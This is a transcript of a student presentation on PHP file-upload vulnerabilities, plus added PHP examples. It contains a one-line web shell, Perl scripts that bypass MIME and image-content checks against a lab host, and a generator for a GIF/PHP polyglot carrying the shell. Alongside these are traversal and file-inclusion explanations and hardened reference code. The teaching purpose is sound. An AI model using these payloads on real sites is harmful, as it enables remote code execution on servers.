PHP Exploits

csci6621 prezi by Matthew Rodriguez, 20 April 2010

Transcript of PHP Exploits

PHP Exploitation

Project outline:
1. Gain an understanding of PHP and known exploits
2. Develop a test environment
3. PHP penetration testing
4. Analyze and report on the penetration testing
5. Mitigate vulnerabilities in the test environment by whitelisting/blacklisting, IDS/IPS and regular expressions
6. PHP penetration testing to assess the mitigation
7. Present a report analyzing the above actions

Agenda:
- Why did we choose this project?
- PHP background; why is it vulnerable?
- Test environment
- Secure file upload in a PHP web application
- Conclusion

Why did we choose this project?
- We did not know ANYTHING about PHP
- No website administration background
- We wanted to learn something new

PHP background
PHP is an open source scripting language for web development used to produce dynamic web pages. It is embedded into the HTML source document and interpreted by a web server with a PHP processor module. PHP is not visible when you view the HTML source of a site.

[Chart: Framework Distribution of the Top Web Technologies. Provided by URLs entered at BuiltWith.com and the Quantcast Top Million; last calculated on April 15, 2010.]

Why is it vulnerable?
- Since it is open source, novice web developers copy and paste vulnerable code from the internet
- The copied code contains vulnerable function calls, a vulnerable order of operations, etc.
- Developers don't understand PHP from a security standpoint

Test environment
Two Windows Server 2003 Standard Edition hosts with Service Pack 2 and all up-to-date Microsoft updates. Software installed:
- phpDesigner 7 - to write PHP code
- wampServer 2.0i (July 11 2009), consisting of:
  - Apache 2.2.11
  - PHP 5.3.0
  - MySQL 5.1.36
  - phpMyAdmin

SECURE FILE UPLOAD IN A PHP WEB APPLICATION
- Naive implementation of file upload
- Content-type verification
- Image file content verification
- File name extension verification
- Indirect access to the uploaded files
- Local file inclusion attacks
- Reference implementation
- Other issues

Handling file uploads normally consists of two somewhat independent functions, and both can be a source of security problems:
(1) accepting files from a user
(2) displaying files to the user

Naive implementation of file upload
Normally users upload files using a web form like the one shown below. Note: we found this type of example code all over the internet without any security measures in place.

<form name="upload" action="upload1.php" method="POST" ENCTYPE="multipart/form-data">
Select the file to upload: <input type="file" name="userfile">
<input type="submit" name="upload" value="upload">
</form>

upload1.php:
<?php

$uploaddir = 'uploads/'; // Relative path under webroot
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

What is shell.php?
<?php
system($_GET['command']);
?>
Once shell.php sits under the web root, requesting it with ?command=... runs arbitrary commands on the server.

Content-type verification
Now we check the MIME type (Multipurpose Internet Mail Extensions, the standard that describes content types in general) in the upload request and refuse the upload if it is not a GIF.

upload2.php:
<?php
if($_FILES['userfile']['type'] != "image/gif") {
    echo "Sorry, we only allow uploading GIF images";
    exit;
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

Code to change the Content-Type: the Content-Type of each part in the multipart request is supplied by the client, so the attacker simply declares shell.php to be image/gif.

#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;

# Upload the local file shell.php under the name shell.php, but label the part image/gif
my $res = $ua->request(POST 'http://192.168.5.128/php-file-upload/upload2.php',
    Content_Type => 'form-data',
    Content => [
        userfile => ["shell.php", "shell.php", "Content-Type" => "image/gif"],
    ],
);
print $res->as_string();

Image file content verification
Here we add more security checking code to our original file upload code: check the actual content of the uploaded file. getimagesize() returns the size and type of the image.

upload3.php:
<?php

$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
    echo "Sorry, we only accept GIF and JPEG images\n";
    exit;
}

$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

PHP code inside a GIF: image formats allow a text comment. The PHP interpreter sees executable PHP code inside the comment and executes it. Change .gif to .php in transit: crocus.gif is a real GIF (so it passes getimagesize()), but it is uploaded under the name crocus.php.

#!/usr/bin/perl
#

use LWP;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;

# Local file crocus.gif carries PHP code in its comment; send it under the name crocus.php
my $res = $ua->request(POST 'http://192.168.5.128/php-file-upload/upload3.php',
    Content_Type => 'form-data',
    Content => [
        userfile => ["crocus.gif", "crocus.php", "Content-Type" => "image/gif"],
    ],
);
print $res->as_string();

File name extension verification
Here we consider a blacklist of extensions as shown below:

upload4.php:
<?php
$blacklist = array(".php", ".phtml", ".php3", ".php4");

foreach ($blacklist as $item) {
    if(preg_match("/$item\$/i", $_FILES['userfile']['name'])) {
        echo "We do not allow uploading PHP files\n";
        exit;
    }
}

$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
    echo "Sorry, we only accept GIF and JPEG images\n";
    exit;
}
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

Live demo.

We now have secure PHP file upload code? We are still vulnerable because of a violated assumption: we assume the user can only upload files through the PHP upload page. But this assumption is not always true. MS IIS supports the HTTP "PUT" request, which allows users to upload files directly and bypass the PHP upload script. Mitigation: make the web directory read only (and remember that updates can change configs).

Indirect access to the uploaded files
Displaying files securely: change the location of the uploaded files to prevent direct web access.

upload5.php:
<?php
$uploaddir = 'c:/uploads/'; # Outside of web root
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>

Simple code to display a file:
<?php
$uploaddir = 'c:/uploads/';
$name = $_GET['name'];
readfile($uploaddir.$name);
?>

Directory Traversal Vulnerability
Unintended traversal to a parent directory by adding ../ to the intended path. The attacker needs to guess how many directories up to reach the correct parent. Do not let the user define the file name on the server.

Local file inclusion attacks: the include function
include() allows PHP scripts to be dynamically added to websites based on user input. A common example is changing the language of a website; code like this is common to multi-language sites:

<?php
# ... some code here
if(isset($_COOKIE['lang'])) {
    $lang = $_COOKIE['lang'];
} elseif (isset($_GET['lang'])) {
    $lang = $_GET['lang'];
} else {
    $lang = 'english';
}
include("language/$lang.php");
# ... some more code here
?>

When combined with the directory traversal vulnerability, an attacker can make the page include any file on the system with the .php extension. include() creates a HUGE security hole.

Reference implementation
- Randomly generate file names and keep track of them in a database by numeric index, not by any part of the file name.
- Now the uploaded files cannot easily be accessed directly through directory traversal.

Other issues
Numerous other things to consider when implementing a file upload function: DoS, performance, access control.

Conclusion
Things to remember:
- use system-generated file names instead of user-supplied file names
- don't just check if the file is an image
- don't just check the file name extensions of uploaded files
Worst case scenario: remote code execution vulnerabilities.
Most important safeguard: make uploaded files not available via direct URL.
Trust:
- your underpaid web administrator to write code?
- websites you go to: always second-guess their security!
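The "PHP code inside a GIF" trick above (a real image whose comment carries PHP, uploaded as crocus.php) can be reproduced with the following script. It is an added example written for this page, not code from the original presentation: it builds a valid 1x1 GIF89a with a comment extension holding the same one-line shell as shell.php, writes it out under both names, and shows that getimagesize() still reports image/gif. The file names and the PHP 7+ runtime are assumptions.

```php
<?php
// make_polyglot.php - added example, not from the original presentation.
// Builds a syntactically valid 1x1 GIF89a whose comment extension (0x21 0xFE)
// carries PHP code. getimagesize() only inspects the header, so it reports
// image/gif; if the same bytes are stored with a .php name under the web root,
// the interpreter echoes the binary prefix and then executes the PHP tag.

function gif_comment_block(string $text): string {
    // A GIF comment extension is a series of sub-blocks: one length byte
    // (max 255) followed by that many data bytes, terminated by a zero byte.
    $out = "\x21\xFE";
    foreach (str_split($text, 255) as $chunk) {
        $out .= chr(strlen($chunk)) . $chunk;
    }
    return $out . "\x00";
}

function build_polyglot_gif(string $phpPayload): string {
    $gif  = "GIF89a";                                   // header + version
    $gif .= "\x01\x00\x01\x00";                         // logical screen 1x1 (little endian)
    $gif .= "\x80\x00\x00";                             // global color table flag, 2 entries
    $gif .= "\x00\x00\x00\xFF\xFF\xFF";                 // color table: black, white
    $gif .= gif_comment_block($phpPayload);             // the PHP code lives here
    $gif .= "\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00"; // image descriptor, 1x1 at 0,0
    $gif .= "\x02\x02\x44\x01\x00";                     // LZW min code size 2, one pixel
    $gif .= "\x3B";                                     // trailer
    return $gif;
}

// Same shell as shell.php on the slides, hidden in the image comment.
$payload = "<?php system(\$_GET['command']); ?>";
$data = build_polyglot_gif($payload);

file_put_contents('crocus.gif', $data);  // what the attacker shows to getimagesize()
file_put_contents('crocus.php', $data);  // identical bytes under an executable name

// Proof that content verification is satisfied: mime=image/gif size=1x1
$info = getimagesize('crocus.gif');
printf("mime=%s size=%dx%d\n", $info['mime'], $info[0], $info[1]);
```

Run it from the command line, then upload crocus.gif with the second Perl script above (which renames it to crocus.php in transit) to reproduce the slide's result against upload3.php.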
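For the language selector shown under "Local file inclusion attacks", the fix is to make sure user input never reaches include() as a path. The following is an added example, not the presentation's code: the same cookie/GET lookup, but the value is matched exactly against a whitelist of known language files and, as defence in depth, the resolved path is checked to stay inside the language directory. The whitelist entries, the language/ directory and PHP 7.1+ are assumptions.

```php
<?php
// Added example, not from the original presentation: the language include
// hardened so that "../" and absolute paths can never be included.

// Whitelist of language files that actually exist under language/
// (an assumption for the demo).
const ALLOWED_LANGS = ['english', 'french', 'spanish'];

function choose_language(?string $requested): string {
    // Exact, type-strict match against the whitelist; anything else
    // ("../../etc/passwd", "english/../../x", an absolute path) falls back.
    if ($requested !== null && in_array($requested, ALLOWED_LANGS, true)) {
        return $requested;
    }
    return 'english';
}

function language_file(string $lang, string $baseDir): string {
    // Defence in depth: even with the whitelist, confirm the resolved path
    // really lives below the language directory before including it.
    // realpath() returns false for a missing file, which is also rejected.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $lang . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file outside allowed directory');
    }
    return $path;
}

// Same precedence as the original: cookie first, then the query string.
$requested = $_COOKIE['lang'] ?? $_GET['lang'] ?? null;
$lang = choose_language($requested);
include language_file($lang, __DIR__ . '/language');
```

The whitelist alone already blocks the traversal; the realpath() check is there so that a later edit to the list (or a symlink dropped into language/) cannot quietly reopen the hole.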
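The "Reference implementation" slide only states the rules (system-generated names, a numeric index in a database, files kept away from direct URLs, content rather than extension checks). The following is an added example that puts them together in one script; it is not code from the original presentation. Assumptions: PHP 7.1+, PDO with the SQLite driver, a storage directory outside the web root, and the table created on first use; all paths and names are made up for the demo.

```php
<?php
// Added example, not from the original presentation: a reference upload
// handler plus viewer that applies the rules above. Assumptions: PHP 7.1+,
// PDO with the SQLite driver, STORAGE_DIR outside the web root, and the
// "uploads" table created on first use. Paths and names are made up.

const STORAGE_DIR = '/var/uploads';                  // not under the web root
const DB_PATH     = '/var/uploads/uploads.sqlite';
const MAX_BYTES   = 2 * 1024 * 1024;                 // cheap DoS guard

// The server picks the MIME type and extension; the client's file name and
// Content-Type are never used to decide anything.
const ALLOWED = ['image/gif' => 'gif', 'image/jpeg' => 'jpg', 'image/png' => 'png'];

function db(): PDO {
    $pdo = new PDO('sqlite:' . DB_PATH);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE IF NOT EXISTS uploads (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        stored_name TEXT NOT NULL,
        mime TEXT NOT NULL,
        original_name TEXT NOT NULL)');
    return $pdo;
}

// Stores one entry of $_FILES and returns its numeric id, or throws.
function accept_upload(array $file): int {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Check the real content, not $_FILES['userfile']['type'] and not the extension.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !array_key_exists($info['mime'], ALLOWED)) {
        throw new RuntimeException('only GIF, JPEG and PNG images are accepted');
    }
    // System-generated name: random, with the extension chosen by the server
    // from the detected type. A PHP tag hidden in an image comment still passes
    // this check, which is why the file lives outside the web root and is only
    // ever sent back with readfile(), never included or executed.
    $stored = bin2hex(random_bytes(16)) . '.' . ALLOWED[$info['mime']];
    $dest   = STORAGE_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    $pdo  = db();
    $stmt = $pdo->prepare('INSERT INTO uploads (stored_name, mime, original_name) VALUES (?, ?, ?)');
    $stmt->execute([$stored, $info['mime'], basename($file['name'])]);
    return (int) $pdo->lastInsertId();
}

// Sends a stored image back by numeric id; the request never names a path,
// so there is nothing for "../" to traverse.
function serve_by_id(int $id): void {
    $stmt = db()->prepare('SELECT stored_name, mime FROM uploads WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        exit("not found\n");
    }
    header('Content-Type: ' . $row['mime']);
    header('X-Content-Type-Options: nosniff');      // the browser must not guess a type
    header('Content-Disposition: inline; filename="image.' . ALLOWED[$row['mime']] . '"');
    readfile(STORAGE_DIR . '/' . $row['stored_name']);
}

// Dispatch: POST from the upload form above (field "userfile"); GET ?id=N to view.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['userfile'])) {
    try {
        $id = accept_upload($_FILES['userfile']);
        echo "Stored as id $id\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected: ' . $e->getMessage() . "\n";
    }
} elseif (isset($_GET['id']) && ctype_digit($_GET['id'])) {
    serve_by_id((int) $_GET['id']);
}
```

Point the form's action at this script and view an upload as ?id=1. The original file name is kept only as metadata in the database; nothing the client sent ever becomes part of a path, a type decision, or an include.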